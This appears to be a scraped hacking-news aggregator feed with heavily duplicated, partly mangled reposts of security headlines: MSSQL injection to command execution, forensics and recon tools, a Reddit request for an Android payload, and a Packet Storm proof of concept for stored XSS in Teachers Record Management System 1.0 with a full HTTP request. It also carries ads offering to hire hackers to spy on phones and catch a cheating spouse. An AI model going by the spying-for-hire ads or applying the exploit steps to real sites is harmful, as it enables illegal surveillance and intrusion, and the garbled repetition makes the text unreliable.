Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
MSSQL Injection to RCE Guide: Read Output of xp_cmdshell
https://cdn-images-1.medium.com/max/1366/0*ht85RT3S3FMN9ryg.png
Unlike in MySQL, MSSQL offers xp_cmdshell , which allows us to execute system commands
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
MSSQL Injection to RCE Guide: Read Output of xp_cmdshell
https://cdn-images-1.medium.com/max/1366/0*ht85RT3S3FMN9ryg.png
Unlike in MySQL, MSSQL offers xp_cmdshell , which allows us to execute system commands
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
MSSQL Injection to RCE Guide: Read Output of xp_cmdshell
Unlike in MySQL, MSSQL offers xp_cmdshell , which allows us to execute system commands
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hire a Cell Phone Hacker for Hire to Hack and Spy on Phone.
https://cdn-images-1.medium.com/max/650/1*BFUJMBlQBAj3O2rOFHGoWA.jpeg
Hire a hacker. Hire a trustworthy certified ethical hacker for hire. Hire The alienmanhackers Do you want to Hire a Hacker committed to…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hire a Cell Phone Hacker for Hire to Hack and Spy on Phone.
https://cdn-images-1.medium.com/max/650/1*BFUJMBlQBAj3O2rOFHGoWA.jpeg
Hire a hacker. Hire a trustworthy certified ethical hacker for hire. Hire The alienmanhackers Do you want to Hire a Hacker committed to…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hire a Cell Phone Hacker for Hire to Hack and Spy on Phone.
Hire a hacker. Hire a trustworthy certified ethical hacker for hire. Hire The alienmanhackers Do you want to Hire a Hacker committed to…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hire A Hacker to Catch Cheating Spouse
https://cdn-images-1.medium.com/max/600/1*UmL_czHaDfnqHo0S1dLbPg.jpeg
Is your partner behaving strangely lately? Do you suspect your partner of concealing information or, worse, of cheating on you? Checking…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hire A Hacker to Catch Cheating Spouse
https://cdn-images-1.medium.com/max/600/1*UmL_czHaDfnqHo0S1dLbPg.jpeg
Is your partner behaving strangely lately? Do you suspect your partner of concealing information or, worse, of cheating on you? Checking…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hire A Hacker to Catch Cheating Spouse
Is your partner behaving strangely lately? Do you suspect your partner of concealing information or, worse, of cheating on you? Checking…
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Volatility GUI - GUI For Volatility Forensics Tool
http://1.bp.blogspot.com/-HWDw6PWHeYA/YMZ22CZQEOI/AAAAAAAAaTs/wzx2FLG_B_AS7KAYtVYPgUNNWCtPL7ECQCK4BGAYYCw/w640-h509/volatility-gui_1_screenshot-784475.jpeg
This is a GUI for Volatility forensics tool written in PyQT5
Prerequisites:
1- Installed version of Volatility.
2- Install PyQT5.
3- Download Volatility GUI.
Configuration
From the downloaded Volatility GUI, edit
2- Volatility binary absolute path in
Then run
After that start the gui by running
Download Volatility-Gui
___________________________
@hacking_Attack
@Hacking_Video
Volatility GUI - GUI For Volatility Forensics Tool
http://1.bp.blogspot.com/-HWDw6PWHeYA/YMZ22CZQEOI/AAAAAAAAaTs/wzx2FLG_B_AS7KAYtVYPgUNNWCtPL7ECQCK4BGAYYCw/w640-h509/volatility-gui_1_screenshot-784475.jpeg
This is a GUI for Volatility forensics tool written in PyQT5
Prerequisites:
1- Installed version of Volatility.
2- Install PyQT5.
sudo apt-get install python3-pyqt53- Download Volatility GUI.
Configuration
From the downloaded Volatility GUI, edit
config.pyfile to specify 1- Python 2 bainary name or python 2 absolute path in python_bin.2- Volatility binary absolute path in
volatility_bin_loc.Then run
config.pyscript to build the profiles list according to your configurations python3 config.pyAfter that start the gui by running
python3 vol_gui.py.Download Volatility-Gui
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Volatility GUI - GUI For Volatility Forensics Tool
Install MassDNS on Kali Linux
MassDNS : a high-performance DNS stub resolver tool.Continue reading on Medium »
Read more...
MassDNS : a high-performance DNS stub resolver tool.Continue reading on Medium »
Read more...
Install MassDNS on Kali Linux
https://medium.com/@sherlock297/install-massdns-on-kali-linux-a743ef044bc8?source=rss------bug_bounty-5
MassDNS : a high-performance DNS stub resolver tool.Continue reading on Medium » (https://medium.com/@sherlock297/install-massdns-on-kali-linux-a743ef044bc8?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@sherlock297/install-massdns-on-kali-linux-a743ef044bc8?source=rss------bug_bounty-5
MassDNS : a high-performance DNS stub resolver tool.Continue reading on Medium » (https://medium.com/@sherlock297/install-massdns-on-kali-linux-a743ef044bc8?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Install MassDNS on Kali Linux
MassDNS : a high-performance DNS stub resolver tool.
Blind XSS to Admin Panel Dashboard
My name is Aniruddha Khadse. I am working as Product Security Engineer, also I am a part time Bug Bounty Hunter. This blog is about my…Continue reading on Medium »
Read more...
My name is Aniruddha Khadse. I am working as Product Security Engineer, also I am a part time Bug Bounty Hunter. This blog is about my…Continue reading on Medium »
Read more...
WHATWEB (“What Is That Website?”)
https://hacksheets.medium.com/whatweb-what-is-that-website-e01a58498b7e?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://hacksheets.medium.com/whatweb-what-is-that-website-e01a58498b7e?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
WHATWEB (“What Is That Website?”)
The WhatWeb is a tool that is used to identify different web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web…
Continue reading on Medium » (https://hacksheets.medium.com/whatweb-what-is-that-website-e01a58498b7e?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
WHATWEB (“What Is That Website?”)
The WhatWeb is a tool that is used to identify different web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web…
Blind XSS to Admin Panel Dashboard
https://aniruddhakhadse.medium.com/blind-xss-to-admin-panel-dashboard-71346efe6459?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://aniruddhakhadse.medium.com/blind-xss-to-admin-panel-dashboard-71346efe6459?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Blind XSS to Admin Panel Dashboard
My name is Aniruddha Khadse. I am working as Product Security Engineer, also I am a part time Bug Bounty Hunter. This blog is about my…
Hello Everyone!Continue reading on Medium » (https://aniruddhakhadse.medium.com/blind-xss-to-admin-panel-dashboard-71346efe6459?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Blind XSS to Admin Panel Dashboard
My name is Aniruddha Khadse. I am working as Product Security Engineer, also I am a part time Bug Bounty Hunter. This blog is about my…
Recon Step/ Methodology
https://vengeance.medium.com/recon-step-methodology-c9664f5ce312?source=rss------bug_bounty-5
This is just a self-note on different steps to perform while approaching a target.Continue reading on Medium » (https://vengeance.medium.com/recon-step-methodology-c9664f5ce312?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://vengeance.medium.com/recon-step-methodology-c9664f5ce312?source=rss------bug_bounty-5
This is just a self-note on different steps to perform while approaching a target.Continue reading on Medium » (https://vengeance.medium.com/recon-step-methodology-c9664f5ce312?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Recon Step/ Methodology
This is just a self-note on different steps to perform while approaching a target.
Recon Step/ Methodology
This is just a self-note on different steps to perform while approaching a target.Continue reading on Medium »
Read more...
This is just a self-note on different steps to perform while approaching a target.Continue reading on Medium »
Read more...
hii guys i was trying to create a payload for android 10 , but it is not working on android 10 , so please help me with this
https://www.reddit.com/r/Pentesting/comments/o20vdd/hii_guys_i_was_trying_to_create_a_payload_for/
submitted by /u/Queasy-Ad-1783 (https://www.reddit.com/user/Queasy-Ad-1783)
[link] (https://www.reddit.com/r/Pentesting/comments/o20vdd/hii_guys_i_was_trying_to_create_a_payload_for/) [comments] (https://www.reddit.com/r/Pentesting/comments/o20vdd/hii_guys_i_was_trying_to_create_a_payload_for/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/o20vdd/hii_guys_i_was_trying_to_create_a_payload_for/
submitted by /u/Queasy-Ad-1783 (https://www.reddit.com/user/Queasy-Ad-1783)
[link] (https://www.reddit.com/r/Pentesting/comments/o20vdd/hii_guys_i_was_trying_to_create_a_payload_for/) [comments] (https://www.reddit.com/r/Pentesting/comments/o20vdd/hii_guys_i_was_trying_to_create_a_payload_for/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
hii guys i was trying to create a payload for android 10 , but it...
Posted in r/Pentesting by u/Queasy-Ad-1783 • 0 points and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Teachers Record Management System 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-hg5R_Iy9kqs/WWlu56TnyEI/AAAAAAAAIJM/rTW1_kDHOwg4grZYYDaMUD1TyZ2BewRDQCLcBGAs/s1600/h107.png
Teachers Record Management System version 1.0 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Teachers Record Management System 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-hg5R_Iy9kqs/WWlu56TnyEI/AAAAAAAAIJM/rTW1_kDHOwg4grZYYDaMUD1TyZ2BewRDQCLcBGAs/s1600/h107.png
Teachers Record Management System version 1.0 suffers from a persistent cross site scripting vulnerability.
MD5 |
5a28d092e9d867e89c133c9325a57ec7Download
# Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS) vulnerability (Authenticated)
# Date: 05-10-2021
# Exploit Author: nhattruong or https://nhattruong.blog
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 + XAMPP v3.2.4
POC:
1. Go to url http://localhost/admin/index.php
2. Do login
3. Execute the payload
4. Reload page to see the different
Payload:
POST /admin/adminprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://localhost
Connection: close
Referer: http://localhost/trms/admin/adminprofile.php
Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l
Upgrade-Insecure-Requests: 1
adminname=Adminm&username=admin&mobilenumber=8979555556&email=">&submit=
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Teachers Record Management System 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.